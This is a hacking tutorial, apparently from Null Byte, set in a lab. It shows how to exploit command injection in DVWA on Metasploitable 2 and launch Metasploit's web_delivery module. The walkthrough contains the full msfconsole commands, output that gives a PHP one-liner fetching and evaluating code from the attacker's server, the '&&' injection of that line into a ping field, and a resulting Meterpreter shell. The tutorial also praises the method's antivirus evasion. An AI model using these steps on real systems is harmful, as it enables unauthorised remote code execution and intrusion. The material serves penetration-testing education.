How To: Use Metasploit's Web Delivery Script & Command Injection to Pop a Shell

Use Metasploit's Web Delivery Script & Command Injection to Pop a Shell

One of the best ways to improve your skills as a hacker is to learn to combine different avenues of attack to achieve success. What if it were possible to get a victim to connect to our machine and execute a chosen payload on our behalf? This is indeed possible with the almighty Metasploit and the aid of a technique known as command injection.

Today, we will be using Kali Linux and Metasploit to attack the vulnerable web application DVWA, included as part of the Metasploitable 2 virtual machine.

Web Delivery Overview

Metasploit contains a useful module that hosts a payload on a server created on the attacking machine. The web delivery script is run once the target machine connects to the server and the payload is then executed. This module is versatile as it can target Python, Powershell, and PHP applications.

The web delivery scripts primary advantage is stealth. The server and payload are both hosted on the attacking machine, so when the exploit is carried out, there is nothing written to disk on the target, making it less likely to trigger antivirus applications and other defenses.

The one caveat of this exploit is that it needs a means of executing commands on the target to kick the script off. One possible method that is ideal for this situation is command injection.

Command Injection Primer

Command injection is a type of attack in which arbitrary operating system commands are executed on the host via a vulnerable web application. Usually, this occurs when an application passes unsafe user input from a form to the server, but this can also happen with cookies, HTTP headers, and other sources of data.

This type of vulnerability is especially dangerous because of the intrinsic power of system commands. Depending on the level of privilege an application is running with, command injection can lead to an attacker owning an entire system.

Step 1: Fire Up DVWA

The first thing we need to do is open DVWA and log in using the default credentials.

Next, browse to the "DVWA Security" tab and set the security level to "low" to make sure our exploit is run without any hiccups when we're ready.

Step 2: Find a Vulnerable Entry Point

Now we can navigate to the "Command Execution" page. For this attack to work, we have to ensure that the target application can communicate with our local machine. We can take advantage of the default functionality of this page to ping our attacking machine. Just enter the IP address and hit "submit."

After receiving a successful reply, the next thing we need to do is determine if this page is vulnerable to command injection. We can do so by appending an operating system command to the IP address we entered. Here, we will add the ls command with the && symbol and hit "submit" again.

We can see that the application responded with the contents of the current directory at the bottom, which means that a command injection vulnerability does indeed exist. We will take advantage of this to launch our web delivery script next.

Step 3: Launch Web Delivery Script

Fire up Metasploit by typing msfconsole in the terminal. We can load the web delivery module with the following command.

msf > use exploit/multi/script/web_delivery

At the prompt, type options to display the current setting for this module.

msf exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python

We need to choose the appropriate target type, which, in this case, is PHP. Please note that for this module to work correctly, the target needs to be set before the payload is chosen. Type show targets to get a list of available options.

msf exploit(multi/script/web_delivery) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)

Now we can set the rest of our options. Perform each command as shown below in order. For set target, it's an ID from the list above. The set payload is the payload we're using, in this case, php/meterpreter/reverse_tcp. For set lhost, it's the listening host address. And for set lport, it's our listening port.

msf exploit(multi/script/web_delivery) > set target 1
target => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 172.16.1.100
lhost => 172.16.1.100
msf exploit(multi/script/web_delivery) > set lport 1234
lport => 1234

Finally, we are ready to launch the attack. Type run at the prompt to start the exploit. The server on our local machine will start. The last line provided by running the exploit, as seen below, is important because it shows the command that needs to be executed on the target system.

msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.1.100:1234
[*] Using URL: http://0.0.0.0:8080/ko3Rb1zps9VTa
[*] Local IP: http://172.16.1.100:8080/ko3Rb1zps9VTa
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.1.100:8080/ko3Rb1zps9VTa'));"

Step 4: Run the Attack

We can use the command injection vulnerability that we discovered earlier as an easy means of attacking. So copy the last line and append it to the IP address with && in the "Command Execution" page in DVWA, just like we did earlier when seeing if the page was vulnerable in the first place.

If everything goes according to plan, once we hit "submit," our payload will execute and a Meterpreter session will be opened. Back in the terminal, we can see that this is exactly what happens.

msf exploit(multi/script/web_delivery) > [*] 172.16.1.102     web_delivery - Delivering Payload
[*] Sending stage (37775 bytes) to 172.16.1.102
[*] Meterpreter session 1 opened (172.16.1.100:1234 -> 172.16.1.102:57343) at 2018-10-22 11:12:05 -0500

We are not automatically dropped into the session, though, so we can use the sessions command to view the active sessions that are open.

msf exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                     Connection
  --  ----  ----                   -----------                     ----------
  1         meterpreter php/linux  www-data (33) @ metasploitable  172.16.1.100:1234 -> 172.16.1.102:57343 (172.16.1.102)

To interact with an active session, use the sessions -i command followed by the appropriate session ID number.

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux

Now we can run Meterpreter commands like getuid and sysinfo to display information about the target machine. We can also drop into a shell by using the shell command.

meterpreter > shell
Process 4869 created.
Channel 0 created.
whoami
www-data
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ps
  PID TTY          TIME CMD
 4656 ?        00:00:00 apache2
 4658 ?        00:00:00 apache2
 4661 ?        00:00:00 apache2
 4663 ?        00:00:00 apache2
 4665 ?        00:00:00 apache2
 4761 ?        00:00:00 apache2
 4793 ?        00:00:00 apache2
 4855 ?        00:00:00 php
 4856 ?        00:00:00 sh
 4858 ?        00:00:00 php
 4869 ?        00:00:00 sh
 4873 ?        00:00:00 ps

From here, we can issue commands like whoami to view the current user, uname -a to display operating system information, and ps to see a list of running processes. By exploiting command injection in a vulnerable web application, we were able to execute our web delivery script and get a shell on the target without writing anything to disk.

Wrapping Up

In this tutorial, we learned a bit about command injection, Metasploit's web delivery script, and how to combine the two into an effective method of attack. Since this exploit avoids writing anything to disk, it increases the chances of success in evading antivirus solutions. In the world of security, there are often many creative ways to combine different techniques to achieve results, all you have to do is look.

Cover image by Hitarth Jadhav/Pexels; Screenshots by drd_/Null Byte

Be the First to Comment

Share Your Thoughts

  • Hot
  • Latest